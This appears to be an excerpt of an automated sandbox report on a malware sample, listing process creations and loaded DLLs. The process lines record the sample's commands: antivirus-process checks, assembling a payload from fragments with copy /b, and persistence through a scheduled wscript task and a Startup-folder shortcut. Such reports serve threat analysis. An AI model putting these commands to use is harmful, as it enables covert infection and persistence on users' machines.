Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 789919
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Deviation.msi
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Brian" Challenges
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Occupation.com q
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & echo URL="C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & exit
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe | Process created: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe "C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe"
Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe | Process created: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe "C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe"
Source: C:\Users\user\Desktop\random.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                                    Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: winmm.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: wininet.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Section loaded: sspicli.dll
